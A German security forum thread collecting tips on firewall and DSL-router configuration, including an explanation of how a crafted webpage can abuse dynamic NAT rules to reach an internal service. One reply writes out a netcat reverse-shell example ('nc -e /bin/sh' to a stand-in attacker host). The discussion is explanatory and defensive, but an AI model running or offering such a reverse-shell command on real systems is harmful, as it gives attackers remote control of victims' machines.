Tipps im Umgang mit Firewalls

N

NeonZero

0
In Anlehnung an den Firewall-Beitrag aus dem HaBo-Wiki suche ich grundlegende Tipps betreffs der Einstellungen von Firewalls. Das betrifft Desktopfirewalls genauso wie externe Firewalls (auch DSL-Router / DSL-Firewall / Hardwarefirewall genannt). Zudem benötige ich in diesem Zusammenhang Hinweise auf grundlegende Fehler, die bei der Verwendung von Firewalls häufig gemacht werden. Ziel ist es, daraus einen Beitrag über "Tipps im Umgang mit Firewalls" zu erstellen. Wer kann helfen?

Hinweis: Dieser Thread ist das Gegenstück zum Thread ?Tipps für Systeme ohne Firewall?.

Bye, nz
 
nun, ich nutze ein OpenBSD Server, der als FW konfiguriert ist.
Im Serer sind 2 NWK.

Modem -> 1. NWK Server / 2. NWK Server -> Switch.
 
Wenn man eine firewall aufstellt versucht man Regeln zu machen gegen die Angriffe de man kennt. Dass ist nicht gut. Man macht eine bessere firewall wenn man nur die Dinge die man braucht zulässt und alles andere verweigert, da man nicht alle möglichen Angriffe kennt.
 
Danke für eure Antworten. Ich habe einen ersten Entwurf für den Artikel Tipps im Umgang mit externen Firewalls ins wiki gestellt. Kritiken und Anregungen sind immer willkommen.

Zudem gibt es ein Problem, was das Ganze ein wenig hinausgezögert hat: Ich habe mit einigen Freunden verschiedene Exemplare von DSL-Routern getestet. Einige unterstützen per Menü Regeln wie diese, ohne dass die Regel eine Wirkung zeigt. Es wäre sehr hilfreich, wenn ihr mir schreiben könntet, was euer DSL-Router dazu sagt. Thx.

Bye, nz
 
irgendwie steh ich grad auf dem schlauch. kannst du das hier noch mal in anderen worten formulieren? ich raff nicht wirklich wie dieser angriff funktioniert.

Ein möglicher Angriff basiert auf eine speziell präparierte Internetseite, die z.B. über Java eine Verbindungsanforderung aus dem internen Netz zum externen Netz hin initiiert, wobei als Rückgabeport der Port des Netzwerkdienstes angegeben wird. Dadurch erzeugt sie eine dynamische Regel in der NAT-Tabelle, die es dem kontaktierten Internetserver nun erlaubt, auf den Netzwerkdienst zuzugreifen.
Zum Vergrößern anklicken....
 
Original von The Dude
ich raff nicht wirklich wie dieser angriff funktioniert.
Zum Vergrößern anklicken....

OK, das muss ich wohl umformulieren. Danke für den Hinweis.

Um die Attacke besser zu verstehen, betrachte zunächst eine Malware, die auf Deinem PC installiert wurde. Baut diese Malware eine Verbindung zu ihrem Internetserver auf und gibt dabei an, die Antwort auf Port 23 zu erwarten, so kann der kontaktierte Internetserver nun auf den Telnetdienst des PCs zugreifen, da durch die Verbindungsanfrage eine entsprechende dynamische Regel im Router angelegt wurde.

Genau dieser Angriff lässt sich mittels Java auch von extern ausführen. So kann also ein Internetserver über eine speziell präparierte Webpage Zugriff auf Dein System erlangen, sobald Du seine Seite im Browser aufgerufen hast. Und dass, obwohl eine externe Firewall dazwischenhängt.

Bye, nz
 
Original von NeonZero
Um die Attacke besser zu verstehen, betrachte zunächst eine Malware, die auf Deinem PC installiert wurde.
Zum Vergrößern anklicken....

wenn der angreifer schon erfolgreich code auf meinem system ausgefuehrt hat kann er doch gleich ne shell rausschicken. wozu braucht man dann noch eine verbindung von aussen nach innen wenn die malware eine verbindung von innen nach aussen aufbauen kann?
also der angreifer hat z.b. "nc -lvp 80" an und die malware fuehrt "nc -e /bin/sh www.angreifer.com 80" aus. danach hat der angreifer ne shell auf meinem rechner.

Baut diese Malware eine Verbindung zu ihrem Internetserver auf und gibt dabei an, die Antwort auf Port 23 zu erwarten
Zum Vergrößern anklicken....

normalerweise waehlt doch das betriebssystem die quellports fuer ausgehende verbindungen. es sei denn, die malware verwendet einen raw socket. raw sockets erfordern (zumindest unter unix) root rechte. also hat die malware eh schon gewonnen.

sorry, vielleicht verpeil ich gerade voellig das prinzip... :)
 
Original von The Dude
wenn der angreifer schon erfolgreich code auf meinem system ausgefuehrt hat...
Zum Vergrößern anklicken....

Sorry, aber da habe ich mich missverständlich ausgedrückt. Das sollte die Attacke nur Step by Step erklären. Die installierte Malware gehörte zu Stufe eins, die nur verdeutlichen sollte, wie eine solche Regel zustande kommt, die dann schlussendlich den Zugriff auf den Netzwerkdienst ermöglicht. Auf Stufe zwei wird gezeigt, wie man diesen Angriff ausführt, ohne eine Malware auf dem PC zu installieren. Dann ergibt es auch einen Sinn, auf vorhandene Ressourcen (den Netzwerkdienst) zuzugreifen, statt netcat zu verwenden^^

Original von The Dude
normalerweise waehlt doch das betriebssystem die quellports fuer ausgehende verbindungen.
Zum Vergrößern anklicken....

Es geht lediglich darum, eine gefakete Verbindungsanforderung rauszuschicken, um den Router dazu zu veranlassen, die Regel zu erstellen. Es geht nicht darum, dass sich eine Malware tatsächlich an den Port des Netzwerkdienstes bindet, was ohnehin nicht geht, solange der Dienst läuft.

Bye, nz
 
Um antworten zu können musst du eingeloggt sein.
Zurück
Oben